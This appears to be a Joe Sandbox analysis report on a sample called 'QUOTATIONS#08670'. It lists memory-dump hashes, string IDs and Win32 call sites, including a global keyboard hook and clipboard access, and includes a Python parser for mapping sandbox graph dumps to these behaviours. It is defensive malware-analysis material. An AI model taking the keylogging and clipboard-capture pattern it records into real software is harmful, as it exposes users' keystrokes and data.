                                                          • Opcode ID: 59cad9d283bc1d646195fd7bf274356bfe67186b61822e6590f61dacb7c3a3c0
                                                          • Instruction ID: d2d26777b91e32f1818f13cf2c20bd6612924dcd2fe9819a93141fa77209093d
                                                          • Opcode Fuzzy Hash: 59cad9d283bc1d646195fd7bf274356bfe67186b61822e6590f61dacb7c3a3c0
                                                          • Instruction Fuzzy Hash: 53C0483AA400198BCB40ABA8FD190EC7B64EA84322B000072E20A875249F6009298A41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q$PH_q
                                                          • API String ID: 0-3760492949
                                                          • Opcode ID: 37cf674359f53a4c901a9f64c3a6eb2fe707bbf28e5ae9d202e1419447ddbe27
                                                          • Instruction ID: aebebc8a40682d3f37dc014bbd1281ca2900c665929e34203375d1819515b5ca
                                                          • Opcode Fuzzy Hash: 37cf674359f53a4c901a9f64c3a6eb2fe707bbf28e5ae9d202e1419447ddbe27
                                                          • Instruction Fuzzy Hash: 3CD1D2B4A006158FDB18DF69C598EA9B7F2BF8C704F2580A8E505AB375CB31AD01DF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: F
                                                          • API String ID: 0-2945319695
                                                          • Opcode ID: 3cb5f78cb0ce73daad42f3f5443bcf5c3a8d8d1b4f7029b06b53b1ec208f38cc
                                                          • Instruction ID: 8e9922dc495b0777edbc03441b5290d283b9f4740d48b203ec9bc90969ed177f
                                                          • Opcode Fuzzy Hash: 3cb5f78cb0ce73daad42f3f5443bcf5c3a8d8d1b4f7029b06b53b1ec208f38cc
                                                          • Instruction Fuzzy Hash: 8362B370F043158FCB05EFB8D85465DBBB2BF8A204F45C5AAD089EB295DE349C46CB62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xcq
                                                          • API String ID: 0-450769270
                                                          • Opcode ID: fe67d8a82ee848182db591910d7e81357935e183b1d473f9117f8efcd7f5807e
                                                          • Instruction ID: 3031870e39dd5c0b81d682f6fdbc2283125bc663f1c0355c9bc13106dff79a9e
                                                          • Opcode Fuzzy Hash: fe67d8a82ee848182db591910d7e81357935e183b1d473f9117f8efcd7f5807e
                                                          • Instruction Fuzzy Hash: F1C1B13070030D8BDB281F79994433A7AA7FFC5B01F28996ADB52D7294CE30DD419BA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76007a0383e4b6cf619f301941dce4cf49f4490031febf1286b569ea20b9c1db
                                                          • Instruction ID: 4294c3556f6158eacb82db73e0221eff1b03cfd38d5185a94834d07131c0dbb5
                                                          • Opcode Fuzzy Hash: 76007a0383e4b6cf619f301941dce4cf49f4490031febf1286b569ea20b9c1db
                                                          • Instruction Fuzzy Hash: 5F426E71F102259FCB04EFB8D85465EBBB2BF89204F51C5A9D089EB354EF349886CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee668aa7bc083a0600c7dd91db228a1cefebe9a79695cfb1c5bb051a645f5a3d
                                                          • Instruction ID: 78926489b9a3bad0e9a89508c2b7e6acaad57ddb1f2813b5e2901cdcaadc24ed
                                                          • Opcode Fuzzy Hash: ee668aa7bc083a0600c7dd91db228a1cefebe9a79695cfb1c5bb051a645f5a3d
                                                          • Instruction Fuzzy Hash: 53D1EDB07016158FEB19FB76C494B6EB7EAAF89708F1444ADD10A8B2A4DF35E802C751
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 803bfdf0207cefaed7fcadfab11481507036e25943697785830ac533e221bf10
                                                          • Instruction ID: 0cb84a11c8b7fb4dd08f55c71656dd00906fec47a35b7bf17971aa52026e6698
                                                          • Opcode Fuzzy Hash: 803bfdf0207cefaed7fcadfab11481507036e25943697785830ac533e221bf10
                                                          • Instruction Fuzzy Hash: 2AA19470B002556FDB98ABB8842476F7AA7AFC8305F24856CD00ADB398CE349D47C7D2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c5db4f64df03557735583d145f2f93510bf1e04300da7cceb41266a915309ec
                                                          • Instruction ID: d316f7b2dc8cf96eb7529241d2517edf681424363a06dd1723b420c6f805e50a
                                                          • Opcode Fuzzy Hash: 7c5db4f64df03557735583d145f2f93510bf1e04300da7cceb41266a915309ec
                                                          • Instruction Fuzzy Hash: 77D10B31D10B5A8ACB10EFA4D991A9DF771FF95300F20D79AE50977628EBB06AC4CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5779fe6ccb1a2d0334b5aab6014f110326ae5be0bbb30039bae7901785ca5d59
                                                          • Instruction ID: 22981c385ce269cf5d39c9cf659563fd7aecf9d546a61df685ea244b45518155
                                                          • Opcode Fuzzy Hash: 5779fe6ccb1a2d0334b5aab6014f110326ae5be0bbb30039bae7901785ca5d59
                                                          • Instruction Fuzzy Hash: 39B125B0E15229CBCF44DFA5D945ADDFBF2FB89304F109929C50ABB258D7389902CB24
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfcd77c70a6c5e29c23ca9e7467fa082a088b60db0d942160ece09068accf2fd
                                                          • Instruction ID: cadcf6b781c0d990d39e5e05678119759d5eb0c6c26b836d27510ec0c3673e63
                                                          • Opcode Fuzzy Hash: dfcd77c70a6c5e29c23ca9e7467fa082a088b60db0d942160ece09068accf2fd
                                                          • Instruction Fuzzy Hash: A1D10B31D10B5A8ACB10EFA4D991A9DF771FF95300F20D79AE50977628EBB06AC4CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d4b4e0a1aa2ffdf798db941226d7c888f798eb5fc6d1d5094f91e492b4beee3
                                                          • Instruction ID: 62fb7266aba27aac6379f185ff80899e3049700bce00f8acd4fd82de99144262
                                                          • Opcode Fuzzy Hash: 6d4b4e0a1aa2ffdf798db941226d7c888f798eb5fc6d1d5094f91e492b4beee3
                                                          • Instruction Fuzzy Hash: 83A130B0E111298FCB14DF69C980AAEFBB6FF89304F24D159D408A7359D7309A42CF65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e1896cc2fc993aefb2b573c3649f04a3fac0b907b7aa506f68d96dcc458a076
                                                          • Instruction ID: 4bb00308d12c94aa0829f9c58693b76039b1db0c378640288fd23074aee32f96
                                                          • Opcode Fuzzy Hash: 2e1896cc2fc993aefb2b573c3649f04a3fac0b907b7aa506f68d96dcc458a076
                                                          • Instruction Fuzzy Hash: DA813DB0E151298FCB14DF69C980A9EFBB6FF89304F24C1A9D418A7759DB309A41DF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0125f5e474ba6352025e51db06ef83c968443a7760e96ff243811f3586fd0ced
                                                          • Instruction ID: ccfb39352b138c33db991460f93a5616c9554b730f443a963aef84849a15a256
                                                          • Opcode Fuzzy Hash: 0125f5e474ba6352025e51db06ef83c968443a7760e96ff243811f3586fd0ced
                                                          • Instruction Fuzzy Hash: 6E713EB4E112298FCB14DF69C980A9EBBF6FF89304F14C1A9D408A7759DB309A41DF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 562af0fca5eb9c42340599ce57adb43c4bfe383d25accfd1fef4d4111c15712f
                                                          • Instruction ID: 20ffb4b6eba7f90d1ecea805013f6428d39a4292f858e3909b833425156f4314
                                                          • Opcode Fuzzy Hash: 562af0fca5eb9c42340599ce57adb43c4bfe383d25accfd1fef4d4111c15712f
                                                          • Instruction Fuzzy Hash: CC5151B4E11129CBCB14DFAAC9805AEFBF6FF89304F24D56AD418A7209D7345A42CF61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2b30c2585d7cc4c26db0c67a4974ceffa99d2153f153e5388a5641b2d3f6b3c
                                                          • Instruction ID: 858616619d0ffd51d23cdfd59725d6a3773fd02c8cdcaac238c09dfb805d56cc
                                                          • Opcode Fuzzy Hash: c2b30c2585d7cc4c26db0c67a4974ceffa99d2153f153e5388a5641b2d3f6b3c
                                                          • Instruction Fuzzy Hash: 57514AB1E116188BDB58DF6B8D4579EFAF7BFC9300F14C1BA850DA6224DB341A868F11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39f20cedfcb0bd3412fd31db7aad521598c3570dcfd15a9d38601eb5ef8239b6
                                                          • Instruction ID: 431afeb1e99b0f9f8965440abc14c2aa992873467d1ea13da29b853962319e04
                                                          • Opcode Fuzzy Hash: 39f20cedfcb0bd3412fd31db7aad521598c3570dcfd15a9d38601eb5ef8239b6
                                                          • Instruction Fuzzy Hash: F5413AB1E116198BEB58DF6B8D4478AFBF3BFC9300F14C1BA954CA6264DB341A858F11
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \;_q$\;_q$\;_q$\;_q
                                                          • API String ID: 0-294077808
                                                          • Opcode ID: ba1903b1b9715e70117b4772aaa30983d7ff8f1b6277371a4180c3fb7a1d42ac
                                                          • Instruction ID: a0b07b5df4bfc38827fd26a034b0a8f52e5d7968bce4d6beb6d0e2c6d5f14ae1
                                                          • Opcode Fuzzy Hash: ba1903b1b9715e70117b4772aaa30983d7ff8f1b6277371a4180c3fb7a1d42ac
                                                          • Instruction Fuzzy Hash: 4D019A3271810D8FEBA48E3CC4949357BEAFF88B60735456AE201CB378DAA4DC42C780

                                                          Execution Graph

                                                          Execution Coverage:12.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:190
                                                          Total number of Limit Nodes:22
                                                          execution_graph: rendered in the original report as an interactive node graph; the raw node and edge list is not reproduced here. Entry nodes (no incoming edge): 141d030, 1460848, 1468038, 6bc5428, 6bc64d8, 6bca028, 6bca270, 6bcbcc8, 6bcbe60, 6bcdc28. Win32 API call sites annotated in the graph: GetModuleHandleW (6bc35cc, 6bc3d44, 6bc3e6c, 6bc4f70, 6bc5430, 6bc5478); CallWindowProcW (6bc3e7c, 6bcae80, 6bcb408, 6bcb418, 6bcb5b2); CreateWindowExW (6bc6540); OleInitialize (6bcbd18, 6bcbd1b); OleGetClipboard (6bcbeba); SetWindowsHookExA (6bcdc6c); GetCurrentProcess (6bca06e, 6bca0fd); GetCurrentThread (6bca0c0); GetCurrentThreadId (6bca15b); DuplicateHandle (6bca270); KiUserCallbackDispatcher (6bc35ec, 6bcb850); GlobalMemoryStatusEx (146ed10, 146ee3e, 6befbf9, 6befe54); DeleteFileW (146807e).

                                                          Control-flow Graph (rendered in the original report as an interactive basic-block graph with executed / not-executed colouring; the block and edge list is not reproduced here). Function at 06BE34B0, basic blocks 6be34b0-6be3cbb; internal calls to 6be237c, 6be2388, 6be2394 and 6be23a0; no Win32 API call annotated in the graph.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-155944776
                                                          • Opcode ID: d84ffeca6afd4f86605fa76fa70407b01d7d490810e5ba0e8d6af8afe2c3f4d5
                                                          • Instruction ID: 836289f9a354f9b329cef8ce92bd3e8a0a1e053febc4291fe787c284f128d239
                                                          • Opcode Fuzzy Hash: d84ffeca6afd4f86605fa76fa70407b01d7d490810e5ba0e8d6af8afe2c3f4d5
                                                          • Instruction Fuzzy Hash: 18321E30E1065ACFCB14EF75D95459DB7B6FFC9300F20C6AAD409AB264EB70A985CB81
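The execution_graph and control_flow_graph strings that the Joe Sandbox IDA plugin attaches to this report are whitespace-separated token streams: a node is `<id> <addr>` (or `<id> <start>-<end>` for a basic block), optionally followed by the Win32 API names the node calls, a `call <addr>` target, or a summary such as `2 API calls`; an edge is `<id>-><id>`. The parser below is an added example, not part of the report and not Joe Sandbox code; the token grammar is inferred from the dump text on this page rather than from a published specification, and the embedded sample input is a constructed excerpt of this report's own graphs. It rebuilds the graph, lists the entry nodes (nodes with no incoming edge, which in an execution graph are the functions the sandbox actually observed), indexes API call sites by address, and walks the edges from an entry to collect the APIs reachable from it. That last query is how an analyst maps a behaviour signature such as "Installs a global keyboard hook" back to the SetWindowsHookExA call site at 6bcdc6c, or "Creates a window with clipboard capturing capabilities" to the OleGetClipboard site at 6bcbeba.

```python
"""Parser for the graph dumps Joe Sandbox's IDA plugin emits into a report
("execution_graph ..." / "control_flow_graph ..."). Added example, not Joe
Sandbox code; the grammar is inferred from the dump text in this report:
  node ::= <id> <addr> | <id> <start>-<end>   annot ::= <Api> | call <addr> | <n> API calls
  edge ::= <id>-><id>                          (addresses are hex without 0x)
"""
from __future__ import annotations

import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Node:
    nid: int
    addr: int                      # node / basic-block start address
    end: int | None = None         # block end address when the dump gives a range
    apis: list[str] = field(default_factory=list)   # Win32 APIs annotated on the node
    calls: list[int] = field(default_factory=list)  # "call <addr>" targets
    note: str | None = None        # summary annotation such as "2 API calls"


@dataclass
class Graph:
    kind: str
    nodes: dict[int, Node] = field(default_factory=dict)
    edges: list[tuple[int, int]] = field(default_factory=list)


def parse_graph(text: str) -> Graph:
    """Tokenise one dump string into nodes, their annotations and edges."""
    toks = text.split()
    g = Graph(kind=toks[0])
    cur: Node | None = None
    i, n = 1, len(toks)
    while i < n:
        t = toks[i]
        if (m := EDGE_RE.match(t)):
            g.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t.isdigit() and i + 1 < n and (m := ADDR_RE.match(toks[i + 1])):
            # "<id> <addr>" opens a new node; the tokens that follow annotate it
            end = int(m.group(2), 16) if m.group(2) else None
            cur = Node(int(t), int(m.group(1), 16), end)
            g.nodes[cur.nid] = cur
            i += 2
        elif cur is None:
            raise ValueError(f"annotation {t!r} before the first node")
        elif t.isdigit() and toks[i + 1:i + 3] == ["API", "calls"]:
            cur.note = f"{t} API calls"
            i += 3
        elif t == "call" and i + 1 < n:
            cur.calls.append(int(toks[i + 1], 16))
            i += 2
        else:
            cur.apis.append(t)
            i += 1
    return g


def roots(g: Graph) -> list[Node]:
    """Nodes with no incoming edge: in an execution_graph, the observed entry points."""
    targets = {dst for _, dst in g.edges}
    return sorted((nd for nid, nd in g.nodes.items() if nid not in targets),
                  key=lambda nd: nd.addr)


def reachable_apis(g: Graph, start: int) -> list[str]:
    """Every API annotated on a node reachable from node id `start` (BFS over edges)."""
    succ: dict[int, list[int]] = {}
    for src, dst in g.edges:
        succ.setdefault(src, []).append(dst)
    seen, queue, apis = {start}, deque([start]), set()
    while queue:
        nid = queue.popleft()
        if nid in g.nodes:
            apis.update(g.nodes[nid].apis)
        for nxt in succ.get(nid, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return sorted(apis)


def api_index(g: Graph) -> dict[str, list[int]]:
    """Map each API name to the sorted addresses of the nodes that reference it."""
    idx: dict[str, list[int]] = {}
    for nd in g.nodes.values():
        for api in nd.apis:
            idx.setdefault(api, []).append(nd.addr)
    return {k: sorted(v) for k, v in idx.items()}


# Constructed sample: a subset of this report's execution_graph text (other nodes dropped).
EXEC_DUMP = (
    "execution_graph 38975 141d030 38976 141d048 38975->38976 38977 141d0a2 38976->38977 "
    "38992 6bc6690 38976->38992 38993 6bc66b6 38992->38993 38994 6bc3e6c GetModuleHandleW "
    "38993->38994 38995 6bc66c2 38994->38995 38996 6bc3e7c CallWindowProcW 38995->38996 "
    "38997 6bc66d7 38996->38997 38997->38977 39051 6bcdc28 39052 6bcdc6c SetWindowsHookExA "
    "39051->39052 39054 6bcdcb2 39052->39054 39069 6bcbe60 39070 6bcbeba OleGetClipboard "
    "39069->39070 39071 6bcbefa 39070->39071 38906 146ece8 38908 146ed10 2 API calls "
    "38906->38908 38884 6bef9cd 38885 6befbf9 GlobalMemoryStatusEx GlobalMemoryStatusEx 38884->38885"
)
# The report's control_flow_graph text for the function at 6bca028, reproduced verbatim.
CFG_DUMP = (
    "control_flow_graph 280 6bca028-6bca0b7 GetCurrentProcess 284 6bca0b9-6bca0bf 280->284 "
    "285 6bca0c0-6bca0f4 GetCurrentThread 280->285 284->285 286 6bca0fd-6bca131 GetCurrentProcess "
    "285->286 287 6bca0f6-6bca0fc 285->287 288 6bca13a-6bca155 call 6bca1f8 286->288 "
    "289 6bca133-6bca139 286->289 287->286 293 6bca15b-6bca18a GetCurrentThreadId 288->293 "
    "289->288 294 6bca18c-6bca192 293->294 295 6bca193-6bca1f5 293->295 294->295"
)

if __name__ == "__main__":
    g = parse_graph(EXEC_DUMP)
    for r in roots(g):
        print(f"entry {r.addr:08x} reaches {reachable_apis(g, r.nid)}")
```

Run on the full dump text exported from a report, `roots()` gives one line per observed function entry and `api_index()` a table of API name to call-site addresses that can be joined against the signature list at the top of the report; `reachable_apis()` on a control_flow_graph instead answers which APIs a single function can reach, which is the quick way to confirm, for example, that the GetCurrentProcess / GetCurrentThread / GetCurrentThreadId sequence below all lives in one function.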

                                                          Control-flow Graph (rendered in the original report as an interactive basic-block graph with executed / not-executed colouring; the block and edge list is not reproduced here). Function at 06BE7DC8, basic blocks 6be7dc8-6be8408; internal calls to 6be65e8 from two blocks; no Win32 API call annotated in the graph.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q
                                                          • API String ID: 0-458585787
                                                          • Opcode ID: 661cf952ab0f0e74962ebf3e642a5916948ba9c0e7bdcedf1dc51182884450ed
                                                          • Instruction ID: 08251727a82a3377b4769f7cefd1c8296db2b4778859698669feac162d981b6d
                                                          • Opcode Fuzzy Hash: 661cf952ab0f0e74962ebf3e642a5916948ba9c0e7bdcedf1dc51182884450ed
                                                          • Instruction Fuzzy Hash: 6E02AE70B006068FDB54DF65D990BAEB7A2FF84304F1485A9E806EB395DB35EC46CB81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: 090a68761edcd1e6860f180fddad665df7213e45f2619f331d56f5ca1bcf44fe
                                                          • Instruction ID: 04f25d9b19e9d847d503c5e974f795d7e0ea16e0772e865796630bd1f970e678
                                                          • Opcode Fuzzy Hash: 090a68761edcd1e6860f180fddad665df7213e45f2619f331d56f5ca1bcf44fe
                                                          • Instruction Fuzzy Hash: BB22D4B6E002059FDF64DFA4C4906AEBBB2FF85318F2084A9D455AB355DB36DC42CB90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f29d59d05ac19d549d5de68a3513280ef813d97c02f8625340573d8a025100d
                                                          • Instruction ID: 457477470d919cdd011de13f32369b6882aa11cab63acf05cdce26541f7de5f4
                                                          • Opcode Fuzzy Hash: 2f29d59d05ac19d549d5de68a3513280ef813d97c02f8625340573d8a025100d
                                                          • Instruction Fuzzy Hash: 24924574E00204CFDB64DB68C584A9DBBF2FF48314F5494AAD409AB366DB35ED86CB90
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 081d4d673ce78a8b14e489e657fd2d56088061da508127133f63b429dd13d950
                                                          • Instruction ID: fad8cb90b2bdf4d34520bb332514234d4c3f96733d93de05d0f828e47339a9c7
                                                          • Opcode Fuzzy Hash: 081d4d673ce78a8b14e489e657fd2d56088061da508127133f63b429dd13d950
                                                          • Instruction Fuzzy Hash: D062AC74B102058FDB54DB68D594BADB7F2EF88314F1484A9E806EB395EB35EC46CB80
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fa7945f884c5b6961a4527a344373c3d1809170212cfbe547f7f59956b6a12f
                                                          • Instruction ID: af33fde3807306293b971f6e4a3d806a90ab28347f6ee31f98991fa8f7fcfb75
                                                          • Opcode Fuzzy Hash: 8fa7945f884c5b6961a4527a344373c3d1809170212cfbe547f7f59956b6a12f
                                                          • Instruction Fuzzy Hash: E81260B0E101098FDF64DB68D6907ADB7B2FB45310F2499AAE405EB395CB34DC85CB91

                                                          Control-flow Graph (rendered in the original report as an interactive basic-block graph with executed / not-executed colouring; the block and edge list is not reproduced here). Function at 06BEAD20, basic blocks 6bead20-6beb274; internal calls to 6beb4dc and to 6be65e8 (the latter from two blocks); no Win32 API call annotated in the graph.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-2216122830
                                                          • Opcode ID: f14194f89c42cde6b6457c1a3913781f23059231ae2d6e5dbe28c61fcd0b88b8
                                                          • Instruction ID: b5ee6dd792698be695cfcf57d00a013432fdf63dbcdb2c559c4267cb9da87ebf
                                                          • Opcode Fuzzy Hash: f14194f89c42cde6b6457c1a3913781f23059231ae2d6e5dbe28c61fcd0b88b8
                                                          • Instruction Fuzzy Hash: 76E19E70E1020A8FDB65DF69D5806AEB7B6FF84304F208569E40AEB354DB35EC46CB81

                                                          Control-flow Graph (rendered in the original report as an interactive basic-block graph with executed / not-executed colouring; the block and edge list is not reproduced here). Function at 06BC9FE7, basic blocks 6bc9fe7-6bca1f5; Win32 calls in block order GetCurrentProcess, GetCurrentThread, GetCurrentProcess, then an internal call to 6bca1f8, then GetCurrentThreadId. The blocks from 6bca0b9 onward are shared with the entry at 06BCA028 below.
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA0A6
                                                          • GetCurrentThread.KERNEL32 ref: 06BCA0E3
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA120
                                                          • GetCurrentThreadId.KERNEL32 ref: 06BCA179
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 489984cbd363f15616b0b4125995c6868dde2d5d14be9a450e9fe56ebcbad0ea
                                                          • Instruction ID: cc153f9744e8a4d697bb2c70fa5339695d26e6435492ff3b7a611653574592fd
                                                          • Opcode Fuzzy Hash: 489984cbd363f15616b0b4125995c6868dde2d5d14be9a450e9fe56ebcbad0ea
                                                          • Instruction Fuzzy Hash: 306198B19013098FDB54DFA9D988B9EBBF1FF48304F24C09DD019AB2A0E7349945CB66

                                                          Control-flow Graph (rendered in the original report as an interactive basic-block graph with executed / not-executed colouring; the block and edge list is not reproduced here). Function at 06BCA028, basic blocks 6bca028-6bca1f5; Win32 calls in block order GetCurrentProcess, GetCurrentThread, GetCurrentProcess, then an internal call to 6bca1f8, then GetCurrentThreadId (call sites listed under APIs below).
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 06BCA0A6
